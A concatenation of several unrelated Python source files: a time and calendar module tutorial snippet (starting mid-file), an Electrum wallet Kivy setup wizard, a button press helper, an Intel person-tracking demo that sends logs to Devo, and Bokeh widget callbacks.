tm_min=4, tm_sec=54, tm_wday=6, tm_yday=232, tm_isdst=0) print(time.ctime()) # Sun Aug 20 08:04:16 2017 """ time.strftime("%x", time.localtime(time.time())) %a Locale’s abbreviated weekday name. %A Locale’s full weekday name. %b Locale’s abbreviated month name. %B Locale’s full month name. %c Locale’s appropriate date and time representation. %d Day of the month as a decimal number [01,31]. %H Hour (24-hour clock) as a decimal number [00,23]. %I Hour (12-hour clock) as a decimal number [01,12]. %j Day of the year as a decimal number [001,366]. %m Month as a decimal number [01,12]. %M Minute as a decimal number [00,59]. %p Locale’s equivalent of either AM or PM. (1) %S Second as a decimal number [00,61]. (2) %U Week number of the year (Sunday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Sunday are considered to be in week 0. (3) %w Weekday as a decimal number [0(Sunday),6]. %W Week number of the year (Monday as the first day of the week) as a decimal number [00,53]. All days in a new year preceding the first Monday are considered to be in week 0. (3) %x Locale’s appropriate date representation. %X Locale’s appropriate time representation. %y Year without century as a decimal number [00,99]. %Y Year with century as a decimal number. %Z Time zone name (no characters if no time zone exists). %% A literal '%' character. Notes: """ # for i in range(10): # print(i) # time.sleep(1) # this is executed by 1 second. import calendar print(calendar.calendar(2015)) # October November December # Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su # 1 2 3 4 1 1 2 3 4 5 6 # 5 6 7 8 9 10 11 2 3 4 5 6 7 8 7 8 9 10 11 12 13 # 12 13 14 15 16 17 18 9 10 11 12 13 14 15 14 15 16 17 18 19 20 # 19 20 21 22 23 24 25 16 17 18 19 20 21 22 21 22 23 24 25 26 27 # 26 27 28 29 30 31 23 24 25 26 27 28 29 28 29 30 31 # 30 print(calendar.prmonth(2015,12)) # December 2015 # Mo Tu We Th Fr Sa Su # 1 2 3 4 5 6 # 7 8 9 10 11 12 13 # 14 15 16 17 18 19 20 # 21 22 23 24 25 26 27 # 28 29 30 31 # None print(calendar.weekday(2017, 10, 1)) # 6 this means sunday import random print(random.random()) # 0.5735225127879594 print(random.randint(1, 10)) # print int value between 1 and 10 shuffleList = [1,2,3,4,5] random.shuffle(shuffleList) print(shuffleList) # [2, 1, 3, 5, 4] # import webbrowser # webbrowser.open("https://google.com") # import threading # import time # def hi(): # while True: # time.sleep(1) # print("hi") # for i in range(3): # t = threading.Thread(target=hi, args=()) # t.deamon = True # t.start()
installwizard.py
from functools import partial import threading from kivy.app import App from kivy.clock import Clock from kivy.lang import Builder from kivy.properties import ObjectProperty, StringProperty, OptionProperty from kivy.core.window import Window from kivy.uix.button import Button from kivy.utils import platform from kivy.uix.widget import Widget from kivy.core.window import Window from kivy.clock import Clock from kivy.utils import platform from electrum_gui.kivy.uix.dialogs import EventsDialog from electrum_gui.kivy.i18n import _ from electrum.base_wizard import BaseWizard from password_dialog import PasswordDialog # global Variables app = App.get_running_app() is_test = (platform == "linux") test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve" test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL" Builder.load_string(''' #:import Window kivy.core.window.Window #:import _ electrum_gui.kivy.i18n._ <WizardTextInput@TextInput> border: 4, 4, 4, 4 font_size: '15sp' padding: '15dp', '15dp' background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1) foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1) hint_text_color: self.foreground_color background_active: 'atlas://gui/kivy/theming/light/create_act_text_active' background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active' size_hint_y: None height: '48sp' <WizardButton@Button>: root: None size_hint: 1, None height: '48sp' on_press: if self.root: self.root.dispatch('on_press', self) on_release: if self.root: self.root.dispatch('on_release', self) <BigLabel@Label> color: .854, .925, .984, 1 size_hint: 1, None text_size: self.width, None height: self.texture_size[1] bold: True <-WizardDialog> text_color: .854, .925, .984, 1 value: '' #auto_dismiss: False size_hint: None, None canvas.before: Color: rgba: 0, 0, 0, .9 Rectangle: size: Window.size Color: rgba: .239, .588, .882, 1 Rectangle: size: Window.size crcontent: crcontent # add electrum icon BoxLayout: orientation: 'vertical' if self.width < self.height else 'horizontal' padding: min(dp(27), self.width/32), min(dp(27), self.height/32),\ min(dp(27), self.width/32), min(dp(27), self.height/32) spacing: '10dp' GridLayout: id: grid_logo cols: 1 pos_hint: {'center_y': .5} size_hint: 1, None height: self.minimum_height Label: color: root.text_color text: 'ELECTRUM' size_hint: 1, None height: self.texture_size[1] if self.opacity else 0 font_size: '33sp' font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf' GridLayout: cols: 1 id: crcontent spacing: '1dp' Widget: size_hint: 1, 0.3 GridLayout: rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: id: back text: _('Back') root: root WizardButton: id: next text: _('Next') root: root disabled: root.value == '' <WizardMultisigDialog> value: 'next' Widget size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: _("Choose the number of signatures needed to unlock funds in your wallet") Widget size_hint: 1, 1 GridLayout: orientation: 'vertical' cols: 2 spacing: '14dp' size_hint: 1, 1 height: self.minimum_height Label: color: root.text_color text: _('From %d cosigners')%n.value Slider: id: n range: 2, 5 step: 1 value: 2 Label: color: root.text_color text: _('Require %d signatures')%m.value Slider: id: m range: 1, n.value step: 1 value: 2 <WizardChoiceDialog> message : '' Widget: size_hint: 1, 1 Label: color: root.text_color size_hint: 1, None text_size: self.width, None height: self.texture_size[1] text: root.message Widget size_hint: 1, 1 GridLayout: row_default_height: '48dp' orientation: 'vertical' id: choices cols: 1 spacing: '14dp' size_hint: 1, None <MButton@Button>: size_hint: 1, None height: '33dp' on_release: self.parent.update_amount(self.text) <WordButton@Button>: size_hint: None, None padding: '5dp', '5dp' text_size: None, self.height width: self.texture_size[0] height: '30dp' on_release: self.parent.new_word(self.text) <SeedButton@Button>: height: dp(100) border: 4, 4, 4, 4 halign: 'justify' valign: 'top' font_size: '18dp' text_size: self.width - dp(24), self.height - dp(12) color: .1, .1, .1, 1 background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top' background_down: self.background_normal size_hint_y: None <SeedLabel@Label>: font_size: '12sp' text_size: self.width, None size_hint: 1, None height: self.texture_size[1] halign: 'justify' valign: 'middle' border: 4, 4, 4, 4 <RestoreSeedDialog> message: '' word: '' BigLabel: text: "ENTER YOUR SEED PHRASE" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input_seed text: '' on_text: Clock.schedule_once(root.on_text) on_release: root.options_dialog() SeedLabel: text: root.message BoxLayout: id: suggestions height: '35dp' size_hint: 1, None new_word: root.on_word BoxLayout: id: line1 update_amount: root.update_text size_hint: 1, None height: '30dp' MButton: text: 'Q' MButton: text: 'W' MButton: text: 'E' MButton: text: 'R' MButton: text: 'T' MButton: text: 'Y' MButton: text: 'U' MButton: text: 'I' MButton: text: 'O' MButton: text: 'P' BoxLayout: id: line2 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 0.5, None height: '33dp' MButton: text: 'A' MButton: text: 'S' MButton: text: 'D' MButton: text: 'F' MButton: text: 'G' MButton: text: 'H' MButton: text: 'J' MButton: text: 'K' MButton: text: 'L' Widget: size_hint: 0.5, None height: '33dp' BoxLayout: id: line3 update_amount: root.update_text size_hint: 1, None height: '30dp' Widget: size_hint: 1, None MButton: text: 'Z' MButton: text: 'X' MButton: text: 'C' MButton: text: 'V' MButton: text: 'B' MButton: text: 'N' MButton: text: 'M' MButton: text: ' ' MButton: text: '<' <AddXpubDialog> title: '' message: '' BigLabel: text: root.title GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: '' on_text: Clock.schedule_once(root.check_text) SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height IconButton: id: scan height: '48sp' on_release: root.scan_xpub() icon: 'atlas://gui/kivy/theming/light/camera' size_hint: 1, None WizardButton: text: _('Paste') on_release: root.do_paste() WizardButton: text: _('Clear') on_release: root.do_clear() <ShowXpubDialog> xpub: '' message: _('Here is your master public key. Share it with your cosigners.') BigLabel: text: "MASTER PUBLIC KEY" GridLayout cols: 1 padding: 0, '12dp' orientation: 'vertical' spacing: '12dp' size_hint: 1, None height: self.minimum_height SeedButton: id: text_input text: root.xpub SeedLabel: text: root.message GridLayout rows: 1 spacing: '12dp' size_hint: 1, None height: self.minimum_height WizardButton: text: _('QR code') on_release: root.do_qr() WizardButton: text: _('Copy') on_release: root.do_copy() WizardButton: text: _('Share') on_release: root.do_share() <ShowSeedDialog> spacing: '12dp' value: 'next' BigLabel: text: "PLEASE WRITE DOWN YOUR SEED PHRASE" GridLayout: id: grid cols: 1 pos_hint: {'center_y': .5} size_hint_y: None height: self.minimum_height orientation: 'vertical' spacing: '12dp' SeedButton: text: root.seed_text on_release: root.options_dialog() SeedLabel: text: root.message <LineDialog> BigLabel: text: root.title SeedLabel: text: root.message TextInput: id: passphrase_input multiline: False size_hint: 1, None height: '27dp' SeedLabel: text: root.warning ''') class WizardDialog(EventsDialog): ''' Abstract dialog to be used as the base for all Create Account Dialogs ''' crcontent = ObjectProperty(None) def __init__(self, wizard, **kwargs): super(WizardDialog, self).__init__(**kwargs) self.wizard = wizard self.ids.back.disabled = not wizard.can_go_back() self.app = App.get_running_app() self.run_next = kwargs['run_next'] _trigger_size_dialog = Clock.create_trigger(self._size_dialog) Window.bind(size=_trigger_size_dialog, rotation=_trigger_size_dialog) _trigger_size_dialog() self._on_release = False def _size_dialog(self, dt): app = App.get_running_app() if app.ui_mode[0] == 'p': self.size = Window.size else: #tablet if app.orientation[0] == 'p': #portrait self.size = Window.size[0]/1.67, Window.size[1]/1.4 else: self.size = Window.size[0]/2.5, Window.size[1] def add_widget(self, widget, index=0): if not self.crcontent: super(WizardDialog, self).add_widget(widget) else: self.crcontent.add_widget(widget, index=index) def on_dismiss(self): app = App.get_running_app() if app.wallet is None and not self._on_release: app.stop() def get_params(self, button): return (None,) def on_release(self, button): self._on_release = True self.close() if not button: self.parent.dispatch('on_wizard_complete', None) return if button is self.ids.back: self.wizard.go_back() return params = self.get_params(button) self.run_next(*params) class WizardMultisigDialog(WizardDialog): def get_params(self, button): m = self.ids.m.value n = self.ids.n.value return m, n class WizardChoiceDialog(WizardDialog): def __init__(self, wizard, **kwargs): super(WizardChoiceDialog, self).__init__(wizard, **kwargs) self.message = kwargs.get('message', '') choices = kwargs.get('choices', []) layout = self.ids.choices layout.bind(minimum_height=layout.setter('height')) for action, text in choices: l = WizardButton(text=text) l.action = action l.height = '48dp' l.root = self layout.add_widget(l) def on_parent(self, instance, value): if value: app = App.get_running_app() self._back = _back = partial(app.dispatch, 'on_back') def get_params(self, button): return (button.action,) class LineDialog(WizardDialog): title = StringProperty('') message = StringProperty('') warning = StringProperty('') def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.ids.next.disabled = False def get_params(self, b): return (self.ids.passphrase_input.text,) class ShowSeedDialog(WizardDialog): seed_text = StringProperty('') message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.") ext = False def on_parent(self, instance, value): if value: app = App.get_running_app() self._back = _back = partial(self.ids.back.dispatch, 'on_release') def options_dialog(self): from seed_options import SeedOptionsDialog def callback(status): self.ext = status d = SeedOptionsDialog(self.ext, callback) d.open() def get_params(self, b): return (self.ext,) class WordButton(Button): pass class WizardButton(Button): pass class RestoreSeedDialog(WizardDialog): def __init__(self, wizard, **kwargs): super(RestoreSeedDialog, self).__init__(wizard, **kwargs) self._test = kwargs['test'] from electrum.mnemonic import Mnemonic from electrum.old_mnemonic import words as old_wordlist self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist)) self.ids.text_input_seed.text = test_seed if is_test else '' self.message = _('Please type your seed phrase using the virtual keyboard.') self.title = _('Enter Seed') self.ext = False def options_dialog(self): from seed_options import SeedOptionsDialog def callback(status): self.ext = status d = SeedOptionsDialog(self.ext, callback) d.open() def get_suggestions(self, prefix): for w in self.words: if w.startswith(prefix): yield w def on_text(self, dt): self.ids.next.disabled = not bool(self._test(self.get_text())) text = self.ids.text_input_seed.text if not text: last_word = '' elif text[-1] == ' ': last_word = '' else: last_word = text.split(' ')[-1] enable_space = False self.ids.suggestions.clear_widgets() suggestions = [x for x in self.get_suggestions(last_word)] if last_word in suggestions: b = WordButton(text=last_word) self.ids.suggestions.add_widget(b) enable_space = True for w in suggestions: if w != last_word and len(suggestions) < 10: b = WordButton(text=w) self.ids.suggestions.add_widget(b) i = len(last_word) p = set() for x in suggestions: if len(x)>i: p.add(x[i]) for line in [self.ids.line1, self.ids.line2, self.ids.line3]: for c in line.children: if isinstance(c, Button): if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ': c.disabled = (c.text.lower() not in p) and last_word elif c.text == ' ': c.disabled = not enable_space def on_word(self, w): text = self.get_text() words = text.split(' ') words[-1] = w text = ' '.join(words) self.ids.text_input_seed.text = text + ' ' self.ids.suggestions.clear_widgets() def get_text(self): ti = self.ids.text_input_seed text = unicode(ti.text).strip() text = ' '.join(text.split()) return text def update_text(self, c): c = c.lower() text = self.ids.text_input_seed.text if c == '<': text = text[:-1] else: text += c self.ids.text_input_seed.text = text def on_parent(self, instance, value): if value: tis = self.ids.text_input_seed tis.focus = True #tis._keyboard.bind(on_key_down=self.on_key_down) self._back = _back = partial(self.ids.back.dispatch, 'on_release') app = App.get_running_app() def on_key_down(self, keyboard, keycode, key, modifiers): if keycode[0] in (13, 271): self.on_enter() return True def on_enter(self): #self._remove_keyboard() # press next next = self.ids.next if not next.disabled: next.dispatch('on_release') def _remove_keyboard(self): tis = self.ids.text_input_seed if tis._keyboard: tis._keyboard.unbind(on_key_down=self.on_key_down) tis.focus = False def get_params(self, b): return (self.get_text(), False, self.ext) class ConfirmSeedDialog(RestoreSeedDialog): def get_params(self, b): return (self.get_text(),) def options_dialog(self): pass class ShowXpubDialog(WizardDialog): def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.xpub = kwargs['xpub'] self.ids.next.disabled = False def do_copy(self): self.app._clipboard.copy(self.xpub) def do_share(self): self.app.do_share(self.xpub, _("Master Public Key")) def do_qr(self): from qr_dialog import QRDialog popup = QRDialog(_("Master Public Key"), self.xpub, True) popup.open() class AddXpubDialog(WizardDialog): def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.is_valid = kwargs['is_valid'] self.title = kwargs['title'] self.message = kwargs['message'] def check_text(self, dt): self.ids.next.disabled = not bool(self.is_valid(self.get_text())) def get_text(self): ti = self.ids.text_input return unicode(ti.text).strip() def get_params(self, button): return (self.get_text(),) def scan_xpub(self): def on_complete(text): self.ids.text_input.text = text self.app.scan_qr(on_complete) def do_paste(self): self.ids.text_input.text = test_xpub if is_test else unicode(self.app._clipboard.paste()) def do_clear(self): self.ids.text_input.text = '' class InstallWizard(BaseWizard, Widget): ''' events:: `on_wizard_complete` Fired when the wizard is done creating/ restoring wallet/s. ''' __events__ = ('on_wizard_complete', ) def on_wizard_complete(self, wallet): """overriden by main_window""" pass def waiting_dialog(self, task, msg): '''Perform a blocking task in the background by running the passed method in a thread. ''' def target(): # run your threaded function try: task() except Exception as err: self.show_error(str(err)) # on completion hide message Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1) app.show_info_bubble( text=msg, icon='atlas://gui/kivy/theming/light/important', pos=Window.center, width='200sp', arrow_pos=None, modal=True) t = threading.Thread(target = target) t.start() def terminate(self, **kwargs): self.dispatch('on_wizard_complete', self.wallet) def choice_dialog(self, **kwargs): choices = kwargs['choices'] if len(choices) > 1: WizardChoiceDialog(self, **kwargs).open() else: f = kwargs['run_next'] apply(f, (choices[0][0],)) def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open() def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open() def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open() def confirm_seed_dialog(self, **kwargs): kwargs['title'] = _('Confirm Seed') kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it') ConfirmSeedDialog(self, **kwargs).open() def restore_seed_dialog(self, **kwargs): RestoreSeedDialog(self, **kwargs).open() def add_xpub_dialog(self, **kwargs): kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.') AddXpubDialog(self, **kwargs).open() def add_cosigner_dialog(self, **kwargs): kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index'] kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.') AddXpubDialog(self, **kwargs).open() def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open() def show_error(self, msg): Clock.schedule_once(lambda dt: app.show_error(msg)) def password_dialog(self, message, callback): popup = PasswordDialog() popup.init(message, callback) popup.open() def request_password(self, run_next): def callback(pin): if pin: self.run('confirm_password', pin, run_next) else: run_next(None) self.password_dialog('Choose a PIN code', callback) def confirm_password(self, pin, run_next): def callback(conf): if conf == pin: run_next(pin, False) else: self.show_error(_('PIN mismatch')) self.run('request_password', run_next) self.password_dialog('Confirm your PIN code', callback) def action_dialog(self, action, run_next): f = getattr(self, action) f()
advancedbutton.py
import time import threading DOUBLE_CLICK_TIME = 0.5 LONG_PRESS_TIME = 0.7 class AdvancedButton: def __init__(self, hub): self.state = 0 self.last_pressed = 0 self.press_time = None self.hub = hub self.hub.button.subscribe(self.pressed) self.click = ButtonAction() self.double_click = ButtonAction() self.long_press = ButtonAction() def pressed(self, state): if state == 2: return press_time = time.time() if state == 1: self.state = 1 self.press_time = press_time return if state == 0 and self.state == 1: self.state = 0 press_duration = press_time - self.press_time else: return if press_duration > LONG_PRESS_TIME: # long press self.long_press.notify() return if (press_time - self.last_pressed) < DOUBLE_CLICK_TIME: # double click self.last_pressed = 0 self.double_click.notify() return # could be first of a double click, could be single click self.last_pressed = press_time def timeout(): time.sleep(DOUBLE_CLICK_TIME) if self.last_pressed == press_time: # not clicked while sleeping # single click self.click.notify() threading.Thread(target=timeout).start() class ButtonAction: def __init__(self): self.subscribers = set() def subscribe(self, callback): self.subscribers.add(callback) def unsubscribe(self, callback=None): if callback in self.subscribers: self.subscribers.remove(callback) def notify(self): for subscriber in self.subscribers.copy(): subscriber()
person_tracker_old.py
""" Copyright (c) 2019 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import argparse import os import queue from threading import Thread import json import logging as log import sys import time import cv2 as cv from utils.log_sender import logger from utils.network_wrappers import Detector, VectorCNN from mc_tracker.mct import MultiCameraTracker from utils.misc import read_py_config from utils.streaming import MultiStreamerCapture from utils.visualization import visualize_multicam_detections ### Devo Sender from devo.sender import Sender, SenderConfigSSL, SenderConfigTCP log.basicConfig(stream=sys.stdout, level=log.DEBUG) DEFAULT_SERVER = "eu.elb.relay.logtrust.net" DEFAULT_PORT = 443 DEFAULT_TABLE_NAME = 'my.app.tracker_box.info' DEFAULT_STAT_TABLE_NAME = 'my.app.tracker.stats' DEFAULT_SOURCE = "unknown" KEY = "CERTS/key.key" CERT = "CERTS/cert.crt" CHAIN = "CERTS/chain.crt" class FramesThreadBody: def __init__(self, capture, timer, max_queue_length=2): self.process = True self.frames_queue = queue.Queue() self.capture = capture self.max_queue_length = max_queue_length self.timer = timer def __call__(self): while self.process: if self.frames_queue.qsize() > self.max_queue_length: time.sleep(self.timer) has_frames, frames = self.capture.get_frames() if not has_frames and self.frames_queue.empty(): self.process = False break if has_frames: self.frames_queue.put(frames) def run(params, capture, detector, reid): config = {} if len(params.config): config = read_py_config(params.config) if params.debug: win_name = 'Multi camera tracking' else: engine_config = SenderConfigSSL(address=(params.devo_server, params.devo_port), key=KEY, cert=CERT, chain=CHAIN) sender = Sender(engine_config) # arreglar que el tamaño sea de acuerdo a lo que entra if params.broadcast: GST_PIPE = "appsrc is-live=1 \ ! videoconvert \ ! video/x-raw, width=1920, height=1080, framerate=1/1 \ ! queue \ ! x264enc bitrate=4500 byte-stream=false key-int-max=60 bframes=0 aud=true tune=zerolatency \ ! video/x-h264,profile=main \ ! flvmux streamable=true name=mux \ ! rtmpsink location={0} audiotestsrc \ ! voaacenc bitrate=128000 \ ! mux.".format(params.broadcast) out_send = cv.VideoWriter(GST_PIPE, cv.CAP_GSTREAMER, 0, 1, (1920, 1080), True) tracker = MultiCameraTracker(capture.get_num_sources(), reid, **config) thread_body = FramesThreadBody(capture, params.processing_timer, max_queue_length=len(capture.captures) * 2) frames_thread = Thread(target=thread_body) frames_thread.start() if len(params.output_video): video_output_size = (1920 // capture.get_num_sources(), 1080) fourcc = cv.VideoWriter_fourcc(*'XVID') output_video = cv.VideoWriter(params.output_video, fourcc, 24.0, video_output_size) else: output_video = None while cv.waitKey(1) != 27 and thread_body.process: start = time.time() try: frames = thread_body.frames_queue.get_nowait() except queue.Empty: frames = None if frames is None: continue all_detections = detector.get_detections(frames) all_masks = [[] for _ in range(len(all_detections))] for i, detections in enumerate(all_detections): all_detections[i] = [det[0] for det in detections] all_masks[i] = [det[2] for det in detections if len(det) == 3] tracker.process(frames, all_detections, all_masks) tracked_objects = tracker.get_tracked_objects() if params.debug: fps = round(1 / (time.time() - start), 1) vis = visualize_multicam_detections(frames, tracked_objects, fps) cv.imshow(win_name, vis) if output_video: output_video.write(cv.resize(vis, video_output_size)) if params.broadcast: out_send.write(vis) else: # engine_config = SenderConfigTCP(address=('localhost', 1514)) logger(params.tablename, sender, frames, tracked_objects, params.source) end = time.time() if (params.processing_timer - (end - start)) > 0: time.sleep(params.processing_timer - (end - start)) if params.broadcast: out_send.write(visualize_detections(frames, detections, labels_map, fps)) thread_body.process = False frames_thread.join() if len(params.history_file): history = tracker.get_all_tracks_history() with open(params.history_file, 'w') as outfile: json.dump(history, outfile) def main(): """Prepares data for the person recognition demo""" parser = argparse.ArgumentParser(description='Multi camera multi person \ tracking live demo script') parser.add_argument('-i', type=str, nargs='+', help='List of cameras url address', required=True) parser.add_argument('-m', '--m_detector', type=str, help='Path to the person detection model', default='models/detector/person-detection-retail-0013.xml') parser.add_argument('--t_detector', type=float, default=0.6, help='Threshold for the person detection model') parser.add_argument('--m_reid', type=str, help='Path to the person reidentification model', default='models/detector/person-reidentification-retail-0079.xml') parser.add_argument('--output_video', type=str, default='', required=False) parser.add_argument('--config', type=str, default='', required=False) parser.add_argument('--history_file', type=str, default='', required=False) parser.add_argument('-d', '--device', type=str, default='CPU') parser.add_argument("-l", "--cpu_extension", help="Optional. Required for CPU custom layers. Absolute path to a shared library with the " "kernels implementations.", type=str, default='/root/inference_engine_samples_build/intel64/Release/lib/libcpu_extension.so') parser.add_argument('-p', "--processing_timer", help='Processing time step (in seconds)', default=0.1, type=float) parser.add_argument('-t', '--tablename', help='Table Name.', default=DEFAULT_TABLE_NAME, type=str) parser.add_argument('-ds', '--devo_server', help='Devo Server.', default=DEFAULT_SERVER, type=str) parser.add_argument('-dp', '--devo_port', help='Devo Port.', default=DEFAULT_PORT, type=str) parser.add_argument('-b', "--broadcast", help='Streaming broadcast address.', type=str) parser.add_argument('-db', "--debug", help='Debug Mode: No logs are sent and the images process result is show in a windows ', action="store_true") parser.add_argument('-s', "--source", help='Stream source identifier.', type=str, default=DEFAULT_SOURCE) args = parser.parse_args() capture = MultiStreamerCapture(args.i) person_detector = Detector(args.m_detector, args.t_detector, args.device, args.cpu_extension, capture.get_num_sources()) if args.m_reid: person_recognizer = VectorCNN(args.m_reid, args.device) else: person_recognizer = None run(args, capture, person_detector, person_recognizer) log.info('Demo finished successfully') if __name__ == '__main__': main()
cell_widgets.py
from ipme.utils.functions import get_dim_names_options from .global_reset import GlobalReset from bokeh.models.widgets import Select, Button from functools import partial import threading class CellWidgets: def __init__(self): pass @staticmethod def initialize_widgets(cell): for space in cell.spaces: cell.widgets[space] = {} for _, d_dim in cell.idx_dims.items(): n1, n2, opt1, opt2 = get_dim_names_options(d_dim) cell.widgets[space][n1] = Select(title = n1, value = opt1[0], options = opt1) cell.widgets[space][n1].on_change("value", partial(cell.widget_callback, w_title = n1, space = space)) if n1 not in cell.cur_idx_dims_values: inds = [i for i,v in enumerate(d_dim.values) if v == opt1[0]] cell.cur_idx_dims_values[n1] = inds if n2: cell.widgets[space][n2] = Select(title = n2, value = opt2[0], options=opt2) cell.widgets[space][n2].on_change("value", partial(cell.widget_callback, w_title = n2, space = space)) cell.ic.idx_widgets_mapping(space, d_dim, n1, n2) if n2 not in cell.cur_idx_dims_values: cell.cur_idx_dims_values[n2] = [0] # def _widget_callback(self, attr, old, new, w_title, space): # """ # Callback called when an indexing dimension is set to # a new coordinate (e.g through indexing dimensions widgets). # """ # if old == new: # return # self._ic.add_widget_threads(threading.Thread(target=partial(self._widget_callback_thread, new, w_title, space), daemon=True)) # self._ic._widget_lock_event.set() # # def _widget_callback_thread(self, new, w_title, space): # inds = -1 # w2_title = "" # values = [] # w1_w2_idx_mapping = self._ic._get_w1_w2_idx_mapping() # w2_w1_val_mapping = self._ic._get_w2_w1_val_mapping() # w2_w1_idx_mapping = self._ic._get_w2_w1_idx_mapping() # widgets = self._widgets[space] # if space in w1_w2_idx_mapping and \ # w_title in w1_w2_idx_mapping[space]: # for w2_title in w1_w2_idx_mapping[space][w_title]: # name = w_title+"_idx_"+w2_title # if name in self._idx_dims: # values = self._idx_dims[name].values # elif w_title in self._idx_dims: # values = self._idx_dims[w_title].values # elif space in w2_w1_idx_mapping and \ # w_title in w2_w1_idx_mapping[space]: # for w1_idx in w2_w1_idx_mapping[space][w_title]: # w1_value = widgets[w1_idx].value # values = w2_w1_val_mapping[space][w_title][w1_value] # inds = [i for i,v in enumerate(values) if v == new] # if inds == -1 or len(inds) == 0: # return # self._cur_idx_dims_values[w_title] = inds # if w2_title and w2_title in self._cur_idx_dims_values: # self._cur_idx_dims_values[w2_title] = [0] # if self._mode == 'i': # self._update_source_cds(space) # self._ic._set_global_update(True) # self._update_cds_interactive(space) # elif self._mode == 's': # self._update_cds_static(space) @staticmethod def _widget_callback_int(variableCell, attr, old, new, w_title, space): """ Callback called when an indexing dimension is set to a new coordinate (e.g through indexing dimensions widgets). """ if old == new: return variableCell.ic.add_widget_threads(threading.Thread(target = partial(CellWidgets._widget_callback_thread_inter, variableCell, new, w_title, space), daemon = True)) variableCell.ic.widget_lock_event.set() @staticmethod def _widget_callback_static(variableCell, attr, old, new, w_title, space): """ Callback called when an indexing dimension is set to a new coordinate (e.g through indexing dimensions widgets). """ if old == new: return variableCell.ic.add_widget_threads(threading.Thread(target = partial(CellWidgets._widget_callback_thread_static, variableCell, new, w_title, space), daemon = True)) variableCell.ic.widget_lock_event.set() def _widget_callback_thread_inter(variableCell, new, w_title, space): inds = -1 w2_title = "" values = [] w1_w2_idx_mapping = variableCell.ic.get_w1_w2_idx_mapping() w2_w1_val_mapping = variableCell.ic.get_w2_w1_val_mapping() w2_w1_idx_mapping = variableCell.ic.get_w2_w1_idx_mapping() widgets = variableCell.widgets[space] if space in w1_w2_idx_mapping and w_title in w1_w2_idx_mapping[space]: for w2_title in w1_w2_idx_mapping[space][w_title]: name = w_title+"_idx_"+w2_title if name in variableCell.idx_dims: values = variableCell.idx_dims[name].values if len(values) == 0 and w_title in variableCell.idx_dims: values = variableCell.idx_dims[w_title].values if len(values) == 0 and space in w2_w1_idx_mapping and w_title in w2_w1_idx_mapping[space]: for w1_idx in w2_w1_idx_mapping[space][w_title]: w1_value = widgets[w1_idx].value values = w2_w1_val_mapping[space][w_title][w1_value] inds = [i for i,v in enumerate(values) if v == new] if inds == -1 or len(inds) == 0: return variableCell.cur_idx_dims_values[w_title] = inds if w2_title and w2_title in variableCell.cur_idx_dims_values: variableCell.cur_idx_dims_values[w2_title] = [0] variableCell.update_source_cds(space) variableCell.ic.set_global_update(True) variableCell.update_cds(space) def _widget_callback_thread_static(variableCell, new, w_title, space): inds = -1 w2_title = "" values = [] w1_w2_idx_mapping = variableCell.ic.get_w1_w2_idx_mapping() w2_w1_val_mapping = variableCell.ic.get_w2_w1_val_mapping() w2_w1_idx_mapping = variableCell.ic.get_w2_w1_idx_mapping() widgets = variableCell.widgets[space] if space in w1_w2_idx_mapping and w_title in w1_w2_idx_mapping[space]: for w2_title in w1_w2_idx_mapping[space][w_title]: name = w_title+"_idx_"+w2_title if name in variableCell.idx_dims: values = variableCell.idx_dims[name].values elif w_title in variableCell.idx_dims: values = variableCell.idx_dims[w_title].values elif space in w2_w1_idx_mapping and w_title in w2_w1_idx_mapping[space]: for w1_idx in w2_w1_idx_mapping[space][w_title]: w1_value = widgets[w1_idx].value values = w2_w1_val_mapping[space][w_title][w1_value] inds = [i for i,v in enumerate(values) if v == new] if inds == -1 or len(inds) == 0: return variableCell.cur_idx_dims_values[w_title] = inds if w2_title and w2_title in variableCell.cur_idx_dims_values: variableCell.cur_idx_dims_values[w2_title] = [0] variableCell.update_cds(space) @staticmethod def widget_callback_interactive(variableCell, attr, old, new, w_title, space): CellWidgets._widget_callback_int(variableCell, attr, old, new, w_title, space) @staticmethod def widget_callback_static(variableCell, attr, old, new, w_title, space): CellWidgets._widget_callback_static(variableCell, attr, old, new, w_title, space) 